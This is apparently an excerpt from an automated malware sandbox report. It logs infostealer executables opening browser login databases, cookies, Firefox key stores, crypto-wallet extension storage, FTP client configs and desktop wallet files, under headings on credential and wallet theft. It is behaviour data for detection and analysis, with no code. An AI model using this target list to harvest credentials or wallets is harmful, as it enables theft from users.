Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
